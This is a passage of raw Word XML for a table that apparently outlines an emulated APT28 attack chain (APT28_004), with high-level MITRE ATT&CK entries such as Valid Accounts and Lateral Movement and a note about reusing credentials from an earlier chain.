            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D02ED4" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A14DE3" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2835D342" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="00C37346" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E66D906" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA0752D" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18BC0974" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6529E685" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00AC7A85" w:rsidRDefault="00FB171C" w:rsidP="00FB171C"/>
    <w:p w14:paraId="137D6EF6" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">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430"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="002D1D50" w14:paraId="43E7DEA3" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4E168EDC" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5273704D" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="31A826C5" w14:textId="23D9130B" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT28_00</w:t>
            </w:r>
            <w:r w:rsidR="00B33B9D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1AE42384" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3D335186" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="74CB61F6" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="397A03DE" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="18F32BE6" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="002D1D50" w14:paraId="7B01B185" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3154E304" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2095D517" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F1C9585" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A0D1B3" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1299BDAF" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F0EAD94" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6125D9C9" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0420D7C1" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="002D1D50" w14:paraId="1FEF89B3" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B04342E" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B527BBD" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6661CFE2" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51710337" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77954751" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34DDF5AC" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42269C14" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E3E87E0" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="002D1D50" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="5ADB53FC" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="481A4EF8" w14:textId="7DE7EA3F" w:rsidR="00FB171C" w:rsidRDefault="00C5179A" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34546A6B" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">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30" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25835B0C" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1078 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001F175E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B489C79" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA7A1E0" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F9F900" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48D23AC2" w14:textId="570610E7" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00411B00" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44250270" w14:textId="56B5031A" w:rsidR="00FB171C" w:rsidRPr="00B857D7" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C5122C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00896477">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">26 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Use valid creds </w:t>
            </w:r>
            <w:r w:rsidR="00896477">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>gained in APT28_003 for initial access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00896477" w:rsidRPr="00B857D7" w14:paraId="239248BD" w14:textId="77777777" w:rsidTr="00762933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F4D8D15" w14:textId="70AAC188" w:rsidR="00896477" w:rsidRDefault="00C5179A" w:rsidP="007D132F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2A42A9" w14:textId="45F5B9DB" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132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w:t>
            </w:r>
            <w:r w:rsidR="006F70BC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>08</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="006F70BC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lateral </w:t>
            </w:r>
            <w:r w:rsidR="00743FA9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="294C13C1" w14:textId="33FB3478" w:rsidR="00896477" w:rsidRPr="00B857D7" w:rsidRDefault="00896477" w:rsidP="007D132F">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w:t>
            </w:r>
            <w:r w:rsidR="008649BE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>570</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008649BE">
              <w:rPr>
